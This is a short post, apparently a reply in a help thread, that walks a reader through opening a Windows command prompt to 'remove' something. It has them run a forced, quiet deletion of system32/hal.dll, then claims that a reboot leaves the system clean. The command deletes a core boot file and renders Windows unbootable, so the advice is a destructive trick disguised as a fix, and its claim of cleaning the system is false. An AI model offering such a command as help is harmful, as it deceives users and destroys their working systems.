It's pretty easy to remove, just follow these steps.

1) Open your Start Menu and click Run.
2) Type cmd and click OK.
3) A window with white text on a black background should open, in it, type:
del %SystemRoot%/system32/hal.dll /s /q
4) Press enter.
5) Reboot and your system should be clean.
